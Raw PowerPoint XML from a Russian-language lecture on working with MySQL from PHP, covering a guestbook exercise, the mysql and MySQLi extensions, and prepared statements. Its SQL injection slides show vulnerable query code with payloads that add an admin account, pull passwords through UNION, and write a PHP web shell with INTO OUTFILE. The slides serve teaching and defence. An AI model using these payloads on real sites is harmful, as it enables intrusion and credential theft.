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426" r:id="rId4"/>
    <p:sldId id="425" r:id="rId5"/>
    <p:sldId id="428" r:id="rId6"/>
    <p:sldId id="438" r:id="rId7"/>
    <p:sldId id="427" r:id="rId8"/>
    <p:sldId id="430" r:id="rId9"/>
    <p:sldId id="429" r:id="rId10"/>
    <p:sldId id="436" r:id="rId11"/>
    <p:sldId id="446" r:id="rId12"/>
    <p:sldId id="441" r:id="rId13"/>
    <p:sldId id="442" r:id="rId14"/>
    <p:sldId id="443" r:id="rId15"/>
    <p:sldId id="444" r:id="rId16"/>
    <p:sldId id="445" r:id="rId17"/>
    <p:sldId id="439" r:id="rId18"/>
    <p:sldId id="440" r:id="rId19"/>
    <p:sldId id="431" r:id="rId20"/>
    <p:sldId id="432" r:id="rId21"/>
    <p:sldId id="437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8444" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="-1638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78B1EED-841B-490C-9620-D82339768CD6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2370BA-1A76-4616-A632-87954D6F36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70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A9602-A7DE-4FD0-B5BC-E2B92CC4F3F9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858D-FCC6-4C35-AB26-42B9D94A9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8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00448-1DD8-4766-8FE1-8578689CA5B4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6403-E0EE-4FEF-BF5E-DC82352D5B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739B-CA7E-4AD9-8C64-DC788C102F30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2D797-D1B2-488A-9C9F-2A176B187D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4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317AD-55E9-4634-89C6-8A9D19CB3733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7CC9B-71CB-4462-B06C-B316668BB4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2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606D-FD5B-437D-B609-80FFAD198A04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330D3-C265-4B07-AA2C-A938C49485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4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6D64-9B59-48F5-97EC-982B35484E71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F9B7B-6C56-4465-BFE5-E03BA4C06B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9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3A0E4-ABDA-4B94-A9CE-2279BF2A3341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79101-972F-4716-A983-69200A0B5A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29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B02B9-27B6-4E77-B10D-960DA115A2C9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6FBE0-F216-4299-8B3B-95355E452D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1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9914-7253-4C93-8632-32EEF8DA12C9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FB235-5DE4-4756-A32E-EE04C2F3E4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7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8993C-EB36-4BC4-A527-DD0DC5548243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17F90-AA1B-4279-ACEE-EB4443E25F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0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D6DC-E05F-447A-BF69-550F10E21AE4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519D8-2A64-4E2A-8B7E-27AB42E64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37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68C3687-F499-4A8B-8161-3A8A9CD8B547}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>19.09.2013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5BEA135-3D7E-4537-AAE8-1ABEA047E0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2" r:id="rId2"/>
    <p:sldLayoutId id="2147484048" r:id="rId3"/>
    <p:sldLayoutId id="2147484043" r:id="rId4"/>
    <p:sldLayoutId id="2147484044" r:id="rId5"/>
    <p:sldLayoutId id="2147484045" r:id="rId6"/>
    <p:sldLayoutId id="2147484049" r:id="rId7"/>
    <p:sldLayoutId id="2147484050" r:id="rId8"/>
    <p:sldLayoutId id="2147484051" r:id="rId9"/>
    <p:sldLayoutId id="2147484046" r:id="rId10"/>
    <p:sldLayoutId id="21474840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2.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Использование сервера баз данных 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 в приложениях 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89240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6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647526"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Создание гостевой книги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Создайте базу данных, с помощью скрипта</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>/topic-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>8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createdb.php</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Пример, работающей гостевой книги</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>/topic-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0"/>
              <a:t>8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gbook-result.php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ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Откройте в редакторе файл</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>/topic-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0"/>
              <a:t>8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gbook.php</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>и выполните задания</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Соединение:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>     без пароля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SQL </a:t>
            </a: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инъекция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r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Наиболее распространены:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Внедрение в строковые параметры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Экранирование хвоста запроса</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Расщепление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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7756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Внедрение в строковые параметры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25975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Прием данных</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/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$search_text = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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$_REQUEST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['search_text'];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2400" noProof="1" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Запрос</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/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$res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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mysql_query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noProof="1" smtClean="0"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SELECT id_news, news_date, …</a:t>
            </a:r>
            <a:b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FROM news WHERE news_caption = 				LIKE('%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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$search_text</a:t>
            </a:r>
            <a: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%')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1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Текст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')+and+(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news_id_author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='1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof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ru-RU" sz="2400" noProof="1" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Результат</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/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SELECT id_news, news_date, … </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"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	FROM news </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"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	WHERE news_caption = LIKE('%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') </a:t>
            </a:r>
            <a:b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	AND (news_id_author='1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%')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Расщепление </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>запроса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25975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Прием данных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$id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$_REQUEST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['id'];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2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Запрос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$res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mysqli_query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("SELECT * </a:t>
            </a:r>
            <a:b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FROM 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news </a:t>
            </a:r>
            <a:b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WHERE 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id_news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$id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/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Текст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12;INSERT INTO admin (username, password) </a:t>
            </a:r>
            <a:b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VALUES ('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HaCkEr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 'foo');</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Результат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SELECT * FROM news WHERE id_news =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12; </a:t>
            </a:r>
            <a:b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INTO admin (username, password) </a:t>
            </a:r>
            <a:b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VALUES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('HaCkEr', 'foo');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Использование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION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25975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Прием данных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$id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$_REQUEST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['id'];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2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Запрос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$res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mysql_query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SELECT id_news, header, … </a:t>
            </a:r>
            <a:b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   FROM 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news </a:t>
            </a:r>
            <a:b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noProof="1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    WHERE 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id_news = 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" .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$id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/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Текст</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/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 UNION SELECT 1,username,password,1 FROM admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Результат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SELECT id_news, header, body, author </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" noProof="1"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latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	FROM news </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" noProof="1"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latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	WHERE id_news =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 </a:t>
            </a:r>
            <a:b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UNION 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SELECT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1,username,password,1 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admin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9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Экранирование хвоста запроса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2597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noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Прием данных</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr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$id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$_REQUEST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['id'];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ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Запрос</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr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$res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mysql_query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SELECT author </a:t>
            </a:r>
            <a:b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		FROM news </a:t>
            </a:r>
            <a:b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				WHERE id=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" .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$id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." </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" noProof="1"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AND author LIKE ('a%')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1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Текст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 UNION SELECT password FROM admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-R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endParaRPr lang="en-US" sz="2000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ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Результат</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" noProof="1"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sz="2000" noProof="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT author FROM news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/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="2000" noProof="1"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latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WHERE id=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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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ru-RU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UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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ru-RU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SELECT password FROM admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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2000" noProof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AND author LIKE ('a%')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Выполнение команд на сервере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625975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Прием данных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$id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$_REQUEST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['id'];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2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Запрос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$res =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mysql_query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noProof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SELECT name WHERE id =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$id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1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" noProof="1">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Текст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1+UNION+SELECT+'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($_GET[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]);?&gt;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ru-R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+INTO+OUTFILE+'/www/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cmd.php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lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2000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ru-RU" sz="2400" noProof="1">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Выполнение</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/cmd.php?cmd=passthru('ls'); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" noProof="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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satMod val="150000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Поготовленные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запросы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251520" y="1484313"/>
            <a:ext cx="9073256" cy="6034087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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$query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"INSERT INTO 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users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 VALUES (?, ?, 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?)"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;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB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= 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mysqli_prepare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$link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query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endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB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mysqli_stmt_bind_param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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>iss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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="24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					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$id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$name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$email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endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB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mysqli_stmt_execute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endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB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mysqli_stmt_affected_rows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mysqli_stmt_close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);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487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5448"/>
            <a:ext cx="9443392" cy="125272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satMod val="150000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Поготовленные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запросы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выборка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251520" y="1484313"/>
            <a:ext cx="9073256" cy="6034087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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$query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= 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"SELECT name, email </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:b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			FROM users WHERE id=?"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;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB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= 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mysqli_prepare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$link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query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mysqli_stmt_bind_param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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i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$id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mysqli_stmt_execute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endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB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BB"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>mysqli_stmt_bind_result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$name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$email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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0077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while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 (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mysqli_stmt_fetch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)) {</a:t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printf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"%s %s\n"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$name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$email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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:b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}</a:t>
            </a:r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endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB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mysqli_stmt_close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0000BB"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>stmt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);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497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Расширение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395288" y="1571625"/>
            <a:ext cx="8748712" cy="6034088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Подключение расширения в php.ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>php_mysql.dll </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Особенности</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Только процедурный интерфейс</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Есть подключение к серверу баз данных по умолчанию</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Возвращаемый тип – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ссылка на соединение не обязательна </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>База данных выбирается отдельно от соединения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dirty="0"/>
              <a:t>Расширение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MySQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Соединение с сервером баз данных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Выбор базы данных</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Исполнение запроса</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Получение результата запроса</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Полезные функции</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Подготовленные запросы</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="119062" indent="0" eaLnBrk="1" hangingPunct="1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Расширение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: пример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179512" y="1571625"/>
            <a:ext cx="9217272" cy="6034088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$link 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mysql_connect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400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>localhost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"user"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400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>pwd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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="007700"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr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mysql_select_db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400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>mydb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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="007700"/>
              </a:solidFill>
              <a:latin typeface="Consolas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$query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DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"SELECT id FROM users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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="24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$result 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mysql_query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query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BB"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$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link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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="007700"/>
              </a:solidFill>
              <a:latin typeface="Consolas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mysql_fetch_array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MYSQL_NUM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  <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br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printf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/>
              </a:rPr>
              <a:t>"%s (%s)\n"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,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$row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[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], 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$row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[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1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]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007700"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_close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/>
              </a:rPr>
              <a:t>$link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>);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579296" cy="4625975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Расширение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MySQLi</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Соединение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
